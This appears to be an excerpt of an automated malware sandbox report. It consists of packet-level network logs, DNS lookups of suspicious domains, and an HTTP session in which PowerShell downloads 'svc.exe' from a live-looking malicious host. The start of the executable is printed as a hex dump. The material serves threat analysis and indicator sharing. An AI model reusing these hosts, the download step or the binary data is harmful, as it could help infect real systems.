                                                                                                                              Oct 4, 2024 16:35:46.001034021 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.001385927 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:46.001444101 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.001718998 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:46.091420889 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.091553926 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.091622114 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:46.203198910 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.203375101 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.203389883 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.203547001 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:46.251406908 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:46.292248011 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.292335033 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.292570114 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:46.365797997 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.365992069 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.366003990 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.366091967 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:46.366641045 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.367345095 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:46.457109928 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.457526922 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.457623005 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:46.528362036 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.528417110 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.528429985 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.528774023 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:46.529275894 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.529844999 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:46.530814886 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.531630039 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.531693935 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:46.692573071 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.692713022 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.692728043 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.692766905 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:46.693456888 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.693578005 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:46.804290056 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.804435015 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.804590940 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:46.917555094 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.917702913 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.917714119 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.917933941 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:46.918090105 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.918102980 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:46.918296099 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:46.970052958 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.008591890 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.008872986 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.009120941 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.079915047 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.080051899 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.080065012 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.080336094 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.080822945 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.081013918 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.170752048 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.170805931 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.170974016 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.242032051 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.242047071 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.242058992 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.242598057 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.243017912 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.243421078 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.347429991 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.347562075 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.347700119 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.405287981 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.405306101 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.405320883 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.405388117 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.405638933 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.405649900 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.405908108 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.406322002 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.406486988 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.496973991 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.497055054 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.497229099 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.593420029 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.593503952 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.593544960 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.593724966 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.594135046 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.594242096 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.594372034 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.594383955 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.594430923 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.594702005 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.594712973 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.594765902 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.595408916 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.641911030 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.789047003 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.789189100 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.789196014 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.789458990 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.789803982 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.789817095 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.790280104 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.792962074 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.793015957 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.793113947 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.793122053 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.793216944 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.952496052 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.952635050 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.952649117 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.952764034 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.953263044 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.953409910 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.953459024 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.953471899 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.953520060 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.954190969 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.954204082 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.954215050 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.954365015 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:47.954894066 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.954906940 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:47.955041885 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.001245975 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.120076895 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.120100021 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.120111942 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.120122910 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.120135069 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.120145082 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.120157957 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.120227098 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.120227098 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.120342970 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.120354891 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.120650053 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.121089935 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.121103048 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.121781111 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.282399893 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.282552958 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.282566071 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.282679081 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.283164024 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.283174992 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.283235073 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.283835888 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.283847094 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.284184933 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.284562111 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.284574986 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.284586906 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.284617901 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.284709930 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.444928885 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.445039034 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.445050955 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.445091009 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.445537090 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.445583105 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.446058989 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.446454048 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.446475029 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.446974993 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.446988106 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.447021008 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.447021008 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.447552919 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.447565079 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.447596073 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.503825903 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.607503891 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.607641935 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.607655048 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.607788086 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.608293056 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.608305931 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.608853102 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.608863115 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.609124899 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.609124899 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.609253883 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.609266996 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.610028028 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.610039949 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.610079050 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.610079050 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.610682011 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.610694885 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.610728979 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.657500029 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.697778940 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.751545906 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.771106958 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.771364927 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.771594048 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:35:48.771656990 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.773924112 CEST4973080192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:35:48.778836966 CEST8049730193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:19.265981913 CEST4973780192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:36:19.270863056 CEST8049737193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:19.271095991 CEST4973780192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:36:19.271287918 CEST4973780192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:36:19.271287918 CEST4973780192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:36:19.277751923 CEST8049737193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:19.279463053 CEST8049737193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:29.436254025 CEST8049737193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:29.436783075 CEST8049737193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:29.436867952 CEST4973780192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:36:29.439165115 CEST4973780192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:36:29.444031000 CEST8049737193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:29.769443989 CEST4974780192.168.2.4188.40.141.211
                                                                                                                              Oct 4, 2024 16:36:29.781346083 CEST8049747188.40.141.211192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:29.781555891 CEST4974780192.168.2.4188.40.141.211
                                                                                                                              Oct 4, 2024 16:36:29.781622887 CEST4974780192.168.2.4188.40.141.211
                                                                                                                              Oct 4, 2024 16:36:29.781644106 CEST4974780192.168.2.4188.40.141.211
                                                                                                                              Oct 4, 2024 16:36:29.789511919 CEST8049747188.40.141.211192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:29.789521933 CEST8049747188.40.141.211192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:30.516432047 CEST8049747188.40.141.211192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:30.523267984 CEST4974780192.168.2.4188.40.141.211
                                                                                                                              Oct 4, 2024 16:36:30.523313046 CEST4974780192.168.2.4188.40.141.211
                                                                                                                              Oct 4, 2024 16:36:30.528605938 CEST8049747188.40.141.211192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:30.530424118 CEST8049747188.40.141.211192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:30.849364996 CEST8049747188.40.141.211192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:30.892139912 CEST4974780192.168.2.4188.40.141.211
                                                                                                                              Oct 4, 2024 16:36:46.484601974 CEST4984280192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:36:46.489490032 CEST8049842193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:46.489588976 CEST4984280192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:36:46.489733934 CEST4984280192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:36:46.489761114 CEST4984280192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:36:46.494744062 CEST8049842193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:46.494756937 CEST8049842193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:47.544548988 CEST8049842193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:47.544969082 CEST4984280192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:36:47.546108961 CEST8049842193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:47.546175003 CEST4984280192.168.2.4193.46.217.78
                                                                                                                              Oct 4, 2024 16:36:47.547493935 CEST4974780192.168.2.4188.40.141.211
                                                                                                                              Oct 4, 2024 16:36:47.547528982 CEST4974780192.168.2.4188.40.141.211
                                                                                                                              Oct 4, 2024 16:36:47.550077915 CEST8049842193.46.217.78192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:47.552689075 CEST8049747188.40.141.211192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:47.553380966 CEST8049747188.40.141.211192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:47.878665924 CEST8049747188.40.141.211192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:47.910543919 CEST4974780192.168.2.4188.40.141.211
                                                                                                                              Oct 4, 2024 16:36:47.910578012 CEST4974780192.168.2.4188.40.141.211
                                                                                                                              Oct 4, 2024 16:36:47.918814898 CEST8049747188.40.141.211192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:47.922821999 CEST8049747188.40.141.211192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:48.243761063 CEST8049747188.40.141.211192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:48.298415899 CEST4974780192.168.2.4188.40.141.211
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Oct 4, 2024 16:35:35.073344946 CEST5996653192.168.2.41.1.1.1
                                                                                                                              Oct 4, 2024 16:35:35.805196047 CEST53599661.1.1.1192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:18.979269981 CEST5679653192.168.2.41.1.1.1
                                                                                                                              Oct 4, 2024 16:36:19.264714003 CEST53567961.1.1.1192.168.2.4
                                                                                                                              Oct 4, 2024 16:36:29.441885948 CEST5702853192.168.2.41.1.1.1
                                                                                                                              Oct 4, 2024 16:36:29.766165972 CEST53570281.1.1.1192.168.2.4
                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Oct 4, 2024 16:35:35.073344946 CEST192.168.2.41.1.1.10x81a4Standard query (0)bestmagazineforanimalsunicum.ruA (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 16:36:18.979269981 CEST192.168.2.41.1.1.10x360Standard query (0)unicexpertmagazine.pwA (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 16:36:29.441885948 CEST192.168.2.41.1.1.10xf79bStandard query (0)ceoconstractionstore.plA (IP address)IN (0x0001)false
                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Oct 4, 2024 16:35:35.805196047 CEST1.1.1.1192.168.2.40x81a4No error (0)bestmagazineforanimalsunicum.ru193.46.217.78A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 16:36:19.264714003 CEST1.1.1.1192.168.2.40x360No error (0)unicexpertmagazine.pw193.46.217.78A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 16:36:29.766165972 CEST1.1.1.1192.168.2.40xf79bNo error (0)ceoconstractionstore.pl188.40.141.211A (IP address)IN (0x0001)false
                                                                                                                              • bestmagazineforanimalsunicum.ru
                                                                                                                              • ntswbucbclbamtp.net
                                                                                                                                • unicexpertmagazine.pw
                                                                                                                              • rbjmxbcxvhys.net
                                                                                                                                • ceoconstractionstore.pl
                                                                                                                              • cyofcjcswoxlynm.com
                                                                                                                              • gqhcklmysxvvdkln.com
                                                                                                                              • nxrvulqitgtfsjfu.com
                                                                                                                              • vjkcaufqdqecw.com
                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.449730193.46.217.78802472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 4, 2024 16:35:35.818773985 CEST97OUTGET /download/svc.exe HTTP/1.1
                                                                                                                              Host: bestmagazineforanimalsunicum.ru
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Oct 4, 2024 16:35:38.057301998 CEST1236INHTTP/1.1 200 OK
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Fri, 04 Oct 2024 14:35:37 GMT
                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                              Content-Length: 222720
                                                                                                                              Connection: close
                                                                                                                              Last-Modified: Wed, 02 Oct 2024 05:06:08 GMT
                                                                                                                              ETag: "36600-62377654eb000"
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 06 d2 fc 49 42 b3 92 1a 42 b3 92 1a 42 b3 92 1a 5c e1 16 1a 5e b3 92 1a 5c e1 07 1a 51 b3 92 1a 5c e1 11 1a 1e b3 92 1a 65 75 e9 1a 45 b3 92 1a 42 b3 93 1a 32 b3 92 1a 5c e1 18 1a 43 b3 92 1a 5c e1 06 1a 43 b3 92 1a 5c e1 03 1a 43 b3 92 1a 52 69 63 68 42 b3 92 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1e 60 49 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 80 01 00 00 64 11 00 00 00 00 00 16 17 00 00 00 10 00 00 00 90 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 13 00 00 04 00 00 03 a2 03 00 02 00 00 80 00 00 [TRUNCATED]
                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$IBBB\^\Q\euEB2\C\C\CRichBPEL`Ied@DPPX.text~ `.rdata" "@@.data@.tls@@.rsrcP@@
                                                                                                                              Oct 4, 2024 16:35:38.057317019 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 0d 08 c0 41 00 75 02 f3 c3 e9 11 07 00 00 6a 0c 68 90 a4 41 00 e8 05 15 00 00 8b 75 08 85 f6 74
